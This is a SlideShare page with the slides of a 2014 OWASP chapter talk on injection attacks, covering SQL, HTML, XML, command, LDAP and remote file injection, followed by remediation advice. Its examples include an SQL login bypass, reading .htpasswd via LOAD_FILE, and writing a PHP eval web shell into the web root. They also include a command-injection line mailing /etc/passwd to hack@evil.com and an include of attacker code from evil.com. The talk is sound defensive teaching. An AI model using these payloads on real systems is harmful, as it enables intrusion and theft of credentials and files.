Owasp A1: Injection
31 March 2014: Dubai, UAE
About Me
• Who am I?
– Michael Hendrickx
– Information Security Consultant, currently
working for UAE Federal Government.
...
• Owasp Top 10 – 2013
– A1: Injection
– A2: Broken Authentication and Session Mgmt
– A3: Cross Site Scripting
– A4: Insecu...
How bad is it?
• Oct ‘13: 100k $ stolen from a California ISP
http://thehackernews.com/2013/10/hacker-stole-100000-from-us...
What is Injection?
• Web applications became more complex
– Database driven
– Extra functionality (email, ticket booking, ...
Injection analogy
• A case is filed against me
• I write my name as
“Michael, you are free to go”
• Judge announces case:
...
Injection Fails
Mix of “data” and “commands”.
IT underlying technology?
• A webserver parses and “pass on” data
Web Server
http://somesite.com/msg.php?id=8471350
DB
OS
...
SQL Injection
• Dynamic script to look up data in DB
Web Server
http://somesite.com/login.php?name=michael&password=secret...
SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server
http://somesite....
SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server
http://somesite....
SQL Injection
• Insert value with ’ (single quote)
Web Server
http://somesite.com/login.php?login=michael&password=test’ O...
SQL Injection
• More advanced possibilities:
– Read files*:
• MySQL: SELECT
HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpass...
SQL Injection
• Write files
– MySQL:
CREATE TABLE tmp(data longblog);
INSERT INTO tmp(data) VALUES(0x3c3f7068);
UPDATE tmp...
SQL Injection: SQLMap
• SQL Map will perform
attacks on target.
• Dumps entire tables
• Even entire databases.
• Stores ev...
HTML Injection
• Possible to include HTML tags into fields
• Used to render “special” html tags where
normal text is expec...
HTML Injection
• Possible to insert iframes, fake forms, JS, …
• Can be used in phishing attack
Button goes to different
f...
XML Injection
• Web app talks to backend web services
• Web app’s logic converts parameters to XML
web services (as SOAP, ...
XML Injection
http://somesite.com/create.php?name=michael&email=mh@places.ae
<?xml version=“1.0” encoding=“ISO-8859-1” ?>
...
Command Injection
• Web application performs Operating System
tasks
– Execute external programs / scripts
– List files
– S...
Command Injection
• Dynamic script to share article
Web Server
DBhttp://somesite.com/share.php?to=mh@places.ae
OS
$ echo “...
LDAP Injection
• Lightweight Directory Access Protocol
• LDAP is used to access information directories
– Users
– User inf...
LDAP Injection
• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users
http://www.ne...
Remote File Injection
• Scripts include other files to extend
functionality
• Why? Clarity, Reuse functionality
– PHP:
• i...
Remote File Injection
• Color chooser
• Color will load new file with color codes
(blue.php, red.php, …)
• Attacker can up...
Remote File Injection
• Theme chooser
• Can input external HTML files
– That can contain JavaScript, XSS, rewrite the DOM,...
Remediation
• Implement Web Application Firewall (WAF)
• Prevents most common attacks
– Not 100% foolproof
• Make sure it ...
Remediation
• Validate user input, all input:
– Never trust user input, ever.
– Even stored input (for later use)
– Force ...
Remediation
• Adopt least-privilege policies
– Give DB users least privileges
– Use multiple DB users
– Run processes with...
Summary
• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense i...
Thank you!
Michael Hendrickx
me@michaelhendrickx.com
@ndrix
Upcoming SlideShare
Loading in...5
×

Owasp Top 10 A1: Injection

5,094

Published on

A short talk I gave in a get together for the Owasp UAE chapter about the top 10's A1: Injection.

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
5,094
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
247
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Owasp Top 10 A1: Injection

  1. 1. Owasp A1: Injection 31 March 2014: Dubai, UAE
  2. 2. About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
  3. 3. • Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
  4. 4. How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
  5. 5. What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
  6. 6. Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
  7. 7. Injection Fails Mix of “data” and “commands”.
  8. 8. IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
  9. 9. SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
  10. 10. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  11. 11. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  12. 12. SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
  13. 13. SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
  14. 14. SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
  15. 15. SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
  16. 16. HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
  17. 17. HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
  18. 18. XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
  19. 19. XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
  20. 20. Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
  21. 21. Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
  22. 22. LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
  23. 23. LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
  24. 24. Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
  25. 25. Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
  26. 26. Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
  27. 27. Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
  28. 28. Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
  29. 29. Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
  30. 30. Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.
  31. 31. Thank you! Michael Hendrickx me@michaelhendrickx.com @ndrix
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×